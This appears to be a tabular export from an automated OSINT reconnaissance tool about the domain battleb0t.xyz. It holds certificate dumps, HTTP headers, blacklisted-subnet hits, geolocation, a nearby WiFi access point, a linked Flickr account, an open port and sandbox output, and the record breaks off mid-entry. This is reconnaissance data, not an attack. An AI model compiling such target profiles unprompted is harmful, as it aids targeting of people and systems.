| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Flickr (Category: images)
https://www.flickr.com/photos/Altpapier/ | Altpapier |
| 2023-05-12 03:10:10 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [185.199.109.0/24]
http://www.voipbl.org/update | 185.199.109.0/24 |
| 2023-05-12 02:45:10 | Internet Name | No | Hybrid Analysis | 0 | 0 | 1 | 0 | None | kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:44:26 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:74:c7:69:09:be:bf:85:53:83:95:0e:84:5e:23:6b:8f:95
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 17:04:53 2023 GMT
Not After : Jun 25 17:04:52 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c0:92:2b:06:a8:76:be:87:ad:a1:7a:9e:5a:24:
59:36:93:77:df:2f:5f:ec:5d:f8:39:5c:9e:e9:bb:
24:38:91:de:54:5b:7a:21:bd:81:66:b9:f4:29:4c:
2b:fa:57:13:7e:92:b4:15:86:67:29:e9:3d:cd:52:
95:9b:57:3a:5d:e6:e9:45:19:f1:e0:94:39:75:06:
2b:76:17:5a:3c:dc:eb:34:5d:2b:11:01:60:df:20:
e3:b5:60:cd:32:82:ad:56:26:62:d5:06:6e:b6:fa:
a5:d9:a5:4d:79:33:21:15:51:a2:c0:48:15:37:c6:
91:2f:b2:2e:7d:a0:75:7f:50:14:78:92:5d:14:20:
37:35:75:05:53:06:c4:4c:79:be:57:44:4e:7f:9a:
50:6f:84:ce:99:6c:50:c4:25:b5:3b:28:ef:3d:1e:
0d:f1:c2:fb:f7:a2:98:40:97:4e:a6:29:13:ba:fe:
a3:fd:ca:b9:fd:ab:de:51:93:45:07:f4:be:76:56:
10:d6:f8:44:07:0f:8a:0a:1d:0b:2a:3e:ea:d3:77:
c7:f9:17:20:d7:71:23:2b:a0:8f:f4:4a:f3:e4:d4:
5a:5c:2d:ce:df:b4:a0:a0:ac:d7:ab:d8:92:f0:4a:
4c:07:6e:72:26:57:04:a7:82:b9:f3:2d:17:4e:50:
36:d2:94:d7:69:b9:6a:7a:3a:20:4d:5d:1e:75:6c:
84:96:b6:c4:70:f4:80:b9:d6:06:45:7a:52:b8:0e:
0e:2d:fd:2c:dc:22:9b:06:83:b7:ce:89:98:50:8a:
98:25:5c:fe:f2:ac:51:29:2f:08:c4:ff:27:4b:06:
5c:49:dd:d3:39:da:b3:60:fe:da:c7:a0:9e:e7:45:
85:7c:70:41:16:a9:f0:27:f6:98:d1:7c:9f:af:81:
f4:37:0b:12:28:d5:35:6a:e6:e2:66:3b:e1:11:5b:
6a:d4:8d:47:d6:44:64:d5:a9:fc:83:71:f4:46:8c:
69:8f:3e:2f:32:4d:8a:48:3b:ac:ac:88:a4:94:ea:
b5:b5:92:f4:63:d9:95:76:ef:6d:8e:2f:15:8a:59:
65:d3:00:6a:ca:d7:56:11:cf:5f:a7:d4:3d:48:6a:
5d:dd:87:ce:8c:d0:6e:15:cf:fb:5f:c0:02:33:50:
4e:36:37:09:f4:b7:06:18:07:a3:00:b5:58:4a:d2:
bc:0d:0b:5d:96:5b:4e:aa:75:b7:e9:a2:ce:90:ad:
d7:25:96:7f:66:7d:4e:03:23:c1:16:bc:0c:09:9d:
d4:bf:8c:7c:19:2d:8b:39:0c:89:5a:15:97:34:34:
1c:7b:5d:34:19:a2:d0:cb:f4:5c:b0:48:d7:c9:6c:
5d:09:b3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1F:80:B0:A7:B9:49:16:0F:27:7B:7C:B9:F5:38:B5:3D:C9:3C:2F:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 27 18:04:53.353 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:C2:49:4E:83:B3:46:DC:0B:F2:4C:E0:
2C:BD:3A:21:A9:D3:87:F4:AC:B5:4F:45:81:1D:09:75:
FB:9B:D3:9E:A5:02:20:54:1A:EC:0B:6C:62:AB:8A:0B:
14:2D:42:2F:00:E8:AD:FF:98:7D:A9:48:C3:5C:9D:C9:
A1:63:83:E1:17:D2:4C
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 27 18:04:53.360 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:8C:E5:2C:49:4A:30:97:4C:B4:E6:F3:
86:6A:09:B6:EF:84:21:66:BD:9C:17:9A:88:7C:B9:2A:
4D:1D:CC:99:A2:02:20:13:E4:A1:38:F5:80:6B:55:F9:
DB:4D:54:23:A0:D3:2F:61:E4:B8:03:26:A2:87:C1:4D:
B4:9F:8A:D7:F3:2F:04
Signature Algorithm: sha256WithRSAEncryption
3d:8b:b7:2f:1c:19:9b:ce:8a:9f:49:6d:8e:1c:b1:06:ce:80:
4b:f8:df:50:39:97:3e:fb:8f:2c:ca:50:c1:5c:f8:46:84:02:
f2:57:a0:5c:d2:47:ea:75:b7:5b:8e:d7:bb:b6:ac:23:17:33:
df:77:0a:d0:66:44:16:5a:cd:a4:73:04:82:9c:6e:c5:c2:96:
07:18:e4:ea:f3:48:89:72:cc:2c:e6:89:4a:c1:18:8b:b6:a9:
9e:48:30:26:9c:5a:b4:6d:2c:74:dd:50:cc:be:12:4c:8d:38:
29:5e:de:cf:04:54:ae:14:ed:ec:f9:b8:a0:90:94:ff:e1:0c:
9e:34:2b:1c:68:fd:56:79:13:27:78:22:6f:18:f3:9e:26:b0:
3c:46:ba:7f:dd:d6:fc:c7:27:bd:b5:77:38:03:ba:7b:08:e5:
f1:08:df:bb:f5:ea:f4:e1:c8:be:e6:b7:32:bc:2d:9d:1a:68:
d8:d8:3b:7d:a5:0b:bf:d3:08:d9:73:26:67:23:22:51:a7:9a:
35:1e:3d:5b:8d:37:8d:5a:13:a6:11:a6:6e:3f:57:92:c4:df:
b9:a6:2d:3e:a3:ac:33:74:bf:a3:4d:bc:55:ad:8d:cf:76:66:
f9:f9:8f:df:06:4b:e6:21:7f:06:3d:9b:6e:9c:3f:93:fd:2b:
41:f7:2c:66
|
| 2023-05-12 03:09:27 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | cdnjs.cloudflare.com | 188.114.96.1 |
| 2023-05-12 02:45:45 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 2606:50c0:8000::153 |
| 2023-05-12 02:44:37 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:ad:f5:1d:5c:40:76:9e:09:db:d3:8c:1d:cb:38:82:95:b4
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:21:02 2022 GMT
Not After : Feb 15 13:21:01 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:bc:0d:c6:52:1a:f4:41:b3:8f:ff:6e:ef:29:1e:
5b:5e:ca:a6:5c:44:9d:e5:c6:70:3f:08:6f:f9:38:
10:f5:13:d0:66:5a:b9:71:6f:6a:3d:98:fe:a1:c9:
1e:e2:68:0e:39:c7:1b:2b:06:db:0a:26:9f:13:60:
02:61:87:19:4f:2a:83:60:2c:9d:3b:02:d4:aa:1f:
36:2f:37:ac:04:c9:86:6f:43:d0:c7:1c:6c:82:4d:
f1:37:48:aa:50:02:96:76:0d:53:29:d2:5c:3f:af:
a2:60:d4:f3:8a:1b:8f:c3:29:e4:aa:b9:15:bc:f5:
13:3c:fa:a3:6f:f3:90:0d:db:77:82:7f:8b:47:c1:
c7:ab:3a:65:3f:88:24:29:07:f6:a7:60:c1:5d:dd:
64:65:e4:be:2e:01:26:41:49:42:9a:af:bf:7c:9b:
36:a7:e6:53:1a:e9:dc:a1:0c:ba:75:86:a2:9a:cb:
fb:20:88:31:d6:f5:a7:6b:73:a2:9f:48:70:9a:bb:
ba:f4:c9:19:8d:fc:c0:c9:c1:1c:33:82:c5:d2:40:
f0:43:19:a9:2c:f2:ba:04:9c:6d:d4:7e:95:da:55:
f6:9b:84:6a:41:02:aa:4e:26:83:84:f7:f7:a4:d6:
90:49:77:5f:2e:18:7d:3a:04:cf:e4:b9:d3:cf:63:
76:ff
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
7C:D7:88:7D:40:F1:30:F4:3D:4A:35:FE:C7:60:54:0A:C7:C3:45:D3
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 14:21:02.487 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:4A:29:32:04:7E:83:C8:E3:CA:74:E8:65:
A8:E7:72:FB:F7:EC:02:C4:CA:2A:00:42:62:DC:2B:A5:
49:62:AC:5D:02:20:10:34:10:85:04:06:9A:37:DD:34:
8B:EB:6D:37:23:C6:6B:D5:CE:AC:51:45:5A:73:93:8F:
E1:AA:4D:ED:57:A9
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 14:21:02.999 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:65:45:CF:91:32:77:B6:CC:FC:56:40:F0:
C0:A4:EA:C0:CF:8D:AF:0B:05:0C:43:9F:C4:BB:E5:7D:
01:CF:BE:A8:02:20:62:18:A7:AF:95:11:1F:30:73:1D:
57:10:72:3C:2E:86:BA:01:30:1D:25:DD:00:C1:C4:9C:
B7:3E:04:4F:A2:B5
Signature Algorithm: sha256WithRSAEncryption
23:33:8d:4c:78:8e:f3:64:0c:c1:c4:2c:94:6c:9d:82:7c:de:
6f:e2:ee:4f:7a:2d:40:54:e5:f9:69:ae:7d:22:b7:13:59:a5:
d4:dd:fc:4d:91:43:65:92:69:a3:72:da:60:ac:55:6a:86:b7:
ec:77:91:b8:58:17:5c:3a:cc:d1:f5:2f:28:73:bc:a2:43:45:
b7:8a:2b:69:da:38:13:8e:fd:7b:24:e7:cc:7c:c2:bc:4e:f2:
6f:e6:88:27:b7:de:a2:ee:ca:0b:e3:dd:e7:2c:85:1d:bb:81:
98:4e:02:52:1e:17:49:80:64:a2:cd:8e:d5:3d:0c:46:03:05:
fa:58:92:22:3a:de:b2:08:5d:65:c8:59:d8:4e:65:bb:6f:63:
07:55:a7:76:b0:4e:c1:14:15:89:0f:93:f1:ef:eb:cd:3a:62:
2b:2b:55:83:0f:1d:f4:a4:41:fe:3a:7c:e1:0a:1e:53:53:1b:
93:f8:6f:4b:04:ed:ba:ef:f3:95:46:5f:f7:b9:6a:07:fb:cb:
1a:f7:60:bb:02:6c:9a:01:23:d3:1a:76:2a:82:dd:76:3c:9b:
51:d0:24:53:a2:9e:2a:94:99:8d:98:e2:f1:17:14:2e:e8:46:
87:3d:e0:95:8e:01:d9:71:9e:86:f5:5d:a4:dc:8b:2d:37:c1:
fa:3f:95:26
| battleb0t.xyz |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.132): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:45:46 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | Chantilly, Virginia, 20151, United States, North America | 2606:50c0:8003::153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | RTL8186-GW (Net ID: 00:0E:E8:DC:15:E1) | 40.2024, 29.0398 |
| 2023-05-12 02:54:21 | Web Content | No | Web Spider | 3 | 0 | 3 | 0 | None | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>vscode.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:21 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">vscode.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f606679610ce9</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
| vscode.battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} |
| 2023-05-12 02:53:32 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.111.153:80 | 185.199.111.153 |
| 2023-05-12 02:46:00 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://bold.bridge.ufsc.br/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_eb4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_eb4_ConnHashTable<3764>_HashTable_Mutex"\n "IsoScope_eb4_IESQMMUTEX_0_331"\n "IsoScope_eb4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3764"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_eb4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_eb4_IE_EarlyTabStart_0x8d4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_eb4_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_eb4_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "185.199.111.153:443"\n "142.250.191.42:443"\n "151.101.1.229:443"\n "104.17.25.14:443"\n "142.250.141.156:443"\n "142.251.46.227:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bold.bridge.ufsc.br"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bold.bridge.ufsc.br"\n "cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "stats.g.doubleclick.net"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB657.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003336]\n "CabB656.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB656.tmp]- [targetUID: 00000000-00003336]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"dark-logo-ufsc_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "logo-ufsc_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "dark-logo-bridge_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "dark-icn-instagram_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "dark-icn-github_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "icn-instagram_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "logo-bridge_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "dark-icn-linkedin_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "icn-github_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "dark-icn-facebook_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "icn-linkedin_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "icn-facebook_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "app-b11c332b38a6dbf0641f_1_.js" has type "UTF-8 Unicode text with very long lines with LF NEL line terminators"- 